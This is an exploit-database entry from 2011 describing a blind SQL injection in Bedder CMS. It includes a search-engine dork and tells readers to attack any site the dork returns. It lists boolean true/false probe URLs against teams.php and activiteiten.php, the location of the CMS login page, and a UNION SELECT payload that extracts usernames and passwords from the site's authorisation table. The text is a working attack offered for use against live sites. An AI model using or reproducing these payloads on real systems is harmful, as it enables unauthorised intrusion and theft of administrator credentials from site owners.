Bedder CMS Blind SQL Injection Vulnerability

2011-04-17T00:00:00
ID 1337DAY-ID-15872
Type zdt
Reporter ^Xecuti0N3r
Modified 2011-04-17T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #(+)Exploit Title: Bedder CMS Blind SQL Injection Vulnerability
#(+)Author   : ^Xecuti0n3r
#(+) Date    : 15.04.2011
#(+) Hour    : 13:37 PM
#(+) E-mail  :  xecuti0n3r()yahoo.com
#(+) dork    : intext:"Design by Bedder"
#(+) Category  : Web Apps [Blind SQli]
 
____________________________________________________________________
____________________________________________________________________
 
Choose any site that comes up when you enter the dork intext:"Design by Bedder" in search engine
 
 
    *Blind SQL injection Vulnerability*
     
 
 
#   [+]True : http://site.com/teams.php?id=1 and 1=1--
#   [+]False: http://site.com/teams.php?id=1 and 1=2--
#   [+]eViL : http://site.com/teams.php?id=[SQLi]
 
 
 
#   [+]True : http://site.com/activiteiten.php?id=91 and 1=1--
#   [+]False: http://site.com/activiteiten.php?id=91 and 1=2--
#   [+]eViL : http://site.com/activiteiten.php?id=[SQLi]
 
 
#   [+]Cms Login Page is at : http://site.com/cms/index.php
 
#      [+]evIL: teams.php?id=-1+union+select+1,2,concat(autorisatie_gebruikersnaam,0x3a,autorisatie_wachtwoord)+from+autorisatie
 
 
 
____________________________________________________________________
____________________________________________________________________
 
########################################################################
(+)Exploit Coded by: ^Xecuti0n3r
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
########################################################################



#  0day.today [2018-01-02]  #